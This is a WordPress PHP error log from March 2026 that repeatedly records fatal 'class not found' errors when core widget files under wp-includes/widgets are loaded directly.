[03-Mar-2026 12:34:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[03-Mar-2026 18:27:38 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[03-Mar-2026 19:00:36 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[03-Mar-2026 19:40:18 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[03-Mar-2026 20:00:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[04-Mar-2026 10:22:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[04-Mar-2026 11:26:12 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[05-Mar-2026 03:05:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[05-Mar-2026 06:17:37 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[05-Mar-2026 06:37:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[05-Mar-2026 06:40:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[05-Mar-2026 07:24:16 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[05-Mar-2026 07:28:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[05-Mar-2026 08:12:28 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[05-Mar-2026 15:18:05 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[06-Mar-2026 03:02:04 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[06-Mar-2026 03:43:20 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[06-Mar-2026 03:49:22 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[06-Mar-2026 05:48:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[06-Mar-2026 23:01:33 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[06-Mar-2026 23:32:20 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[07-Mar-2026 06:12:16 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[07-Mar-2026 06:16:14 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[07-Mar-2026 07:32:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[07-Mar-2026 18:08:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[08-Mar-2026 03:34:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[08-Mar-2026 04:25:29 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[08-Mar-2026 04:29:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[08-Mar-2026 05:18:20 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[08-Mar-2026 14:51:00 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[09-Mar-2026 03:08:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[09-Mar-2026 03:55:41 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[09-Mar-2026 06:25:32 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[09-Mar-2026 14:04:24 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[09-Mar-2026 14:30:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[10-Mar-2026 01:36:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[10-Mar-2026 03:33:48 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[10-Mar-2026 03:56:15 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[10-Mar-2026 04:57:15 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[10-Mar-2026 08:58:23 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[10-Mar-2026 14:16:27 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[10-Mar-2026 18:43:22 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[10-Mar-2026 20:24:45 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[10-Mar-2026 22:26:49 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[11-Mar-2026 03:34:14 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[11-Mar-2026 04:34:18 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[11-Mar-2026 07:40:49 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[11-Mar-2026 10:55:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[12-Mar-2026 00:54:59 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[12-Mar-2026 03:25:32 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[12-Mar-2026 03:27:49 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[12-Mar-2026 05:17:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[12-Mar-2026 09:22:10 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[12-Mar-2026 10:51:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[12-Mar-2026 16:31:21 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[12-Mar-2026 16:58:43 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[12-Mar-2026 18:37:25 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[13-Mar-2026 01:00:30 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[13-Mar-2026 04:28:39 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[13-Mar-2026 10:41:26 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[13-Mar-2026 17:31:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[13-Mar-2026 19:43:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[13-Mar-2026 21:57:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[14-Mar-2026 01:21:58 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[14-Mar-2026 03:30:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[14-Mar-2026 04:26:43 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[14-Mar-2026 04:57:06 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[14-Mar-2026 09:26:44 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[15-Mar-2026 14:49:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[16-Mar-2026 01:42:28 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[16-Mar-2026 07:20:22 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[16-Mar-2026 07:56:02 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[16-Mar-2026 07:57:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[16-Mar-2026 08:34:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[16-Mar-2026 10:12:57 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[16-Mar-2026 10:22:01 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[16-Mar-2026 10:34:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[16-Mar-2026 10:39:00 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[16-Mar-2026 18:06:58 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[16-Mar-2026 22:39:28 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[17-Mar-2026 14:29:03 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[17-Mar-2026 20:09:58 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[18-Mar-2026 01:41:10 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[18-Mar-2026 07:00:16 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[18-Mar-2026 07:00:45 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[18-Mar-2026 07:01:14 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[18-Mar-2026 07:15:01 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[18-Mar-2026 09:24:15 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[18-Mar-2026 09:39:44 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[18-Mar-2026 10:14:36 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[18-Mar-2026 10:22:41 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[18-Mar-2026 15:21:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[18-Mar-2026 22:07:54 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[19-Mar-2026 00:38:20 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[19-Mar-2026 03:06:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[19-Mar-2026 05:44:32 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[19-Mar-2026 15:24:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[19-Mar-2026 19:51:43 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[20-Mar-2026 03:16:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
